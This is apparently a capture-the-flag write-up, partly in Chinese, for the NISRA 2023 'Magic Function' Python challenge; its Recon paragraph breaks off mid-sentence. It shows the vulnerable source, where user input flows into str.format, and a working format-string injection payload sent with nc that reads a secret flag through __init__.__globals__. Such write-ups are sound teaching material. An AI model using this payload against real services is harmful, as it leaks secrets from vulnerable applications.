NISRA 2023 Enlightened - Magic Function

Posted on | Post modified | In |

NISRA 2023 Enlightened - Magic Function

Background

Magic Function of Python

Source Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
class Test():
	def __init__(self, email='test@nisra.net'):
		self.info = 'test'
		self.email = email

class Secret():
	flag = open("./NISRA-Enlightened-2023/flag.txt", "r").read().strip()


if __name__ == '__main__':
	email = input('Your email: ')

	if email:
		test = Test(email)
	else:
		test = Test()

	msg = ('this is for {test.info}, please contact ' + email + '.').format(test=test)

	print(msg)

Recon

這一題真的很有趣,但也是算通靈的奇淫怪招,仔細看了一下直覺應該是跟format string有關係,比賽的時候的確有想到,但我當時想的payload有點偏掉了,當時的payload是: {test.email}.format(test=Test(Secret().flag)),也就是先傳入Secret().flag給Test這個class,然後再利用format傳入給

Exploit

1
2
$ echo "{test.__init__.__globals__[Secret].flag}" | nc chall2.nisra.net 43001
Your email: this is for test, please contact NISRA{Ma9ic_pY3h0n_!!???}.

Flag: NISRA{Ma9ic_pY3h0n_!!???}